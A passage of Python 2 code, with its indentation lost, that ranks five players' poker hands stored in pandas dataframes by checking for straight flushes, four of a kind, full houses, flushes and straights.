4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a3 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a3 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P4 Evaluation
#With Ace Low
list[0] = [df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 0]]
list[1] = [df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 2]]
list[2] = [df4.iloc[i * 4 + k - 1, 5], df4.iloc[i * 4 + k - 1, 4]]
list[3] = [df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 6]]
list[4] = [df4.iloc[i * 4 + k - 1, 9], df4.iloc[i * 4 + k - 1, 8]]
list[5] = [df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a4 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a4 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 0]]
list[1] = [df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 2]]
list[2] = [df4.iloc[i * 4 + k - 1, 5], df4.iloc[i * 4 + k - 1, 4]]
list[3] = [df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 6]]
list[4] = [df4.iloc[i * 4 + k - 1, 9], df4.iloc[i * 4 + k - 1, 8]]
list[5] = [df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a4 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a4 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P5 Evaluation
#With Ace Low
list[0] = [df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 0]]
list[1] = [df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 2]]
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
for m in range(0, 6):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a5 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a5 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 0]]
list[1] = [df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 2]]
list[2] = [df5.iloc[i * 4 + k - 1, 5], df5.iloc[i * 4 + k - 1, 4]]
list[3] = [df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 6]]
list[4] = [df5.iloc[i * 4 + k - 1, 9], df5.iloc[i * 4 + k - 1, 8]]
list[5] = [df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 10]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a5 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a5 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# Check for Straight flush
if (SF > 0):
print "Straight Flush"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for four of a kind
FK = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a1 = m
break
if count == 4:
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a2 = m
break
if count == 4:
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a3 = m
break
if count == 4:
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a4 = m
break
if count == 4:
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 4:
FK = FK + 1
a5 = m
break
if count == 4:
break
# Checking for Four of a kind
if (FK > 0):
print "Four of a kind"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for full house
FH = 0
a1i = 0
a1ii = 0
a2i = 0
a2ii = 0
a3i = 0
a3ii = 0
a4i = 0
a4ii = 0
a5i = 0
a5ii = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a1i = m
a1ii = n
break
if count == 2:
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a2i = m
a2ii = n
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a3i = m
a3ii = n
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a4i = m
a4ii = n
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a5i = m
a5ii = n
break
# Evaluating for Full House
if (FH > 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
c = 0
if a1i == b:
c = c + 1
if a2i == b:
c = c + 1
if a3i == b:
c = c + 1
if a4i == b:
c = c + 1
if a5i == b:
c = c + 1
if c > 1:
b = max(a1ii, a2ii, a3ii, a4ii, a5ii)
if a1ii == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2ii == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3ii == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4ii == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5ii == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
elif (FH == 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Evaluate for Flush
F = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# Evaluate P1
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
list[5] = df1.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 11],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 11],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[5]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 11])
# Evaluate P2
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
list[5] = df2.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 11],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 11],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
5]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 11])
# Evaluate P3
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
list[5] = df3.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 11],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[
4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 11],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[
4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
5]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 11])
# Evaluate P4
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
list[5] = df4.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 11],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[
4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 11],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[
4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
5]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 11])
# Evaluate P5
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
list[5] = df5.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 11],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[
4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 11],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[
4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
5]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 11])
if F > 0:
print "Flush"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for Straight
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
# With Ace Low
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
for m in range(0, 6):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == list[5]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == list[
5]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P2 Evaluation
# With Ace Low
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
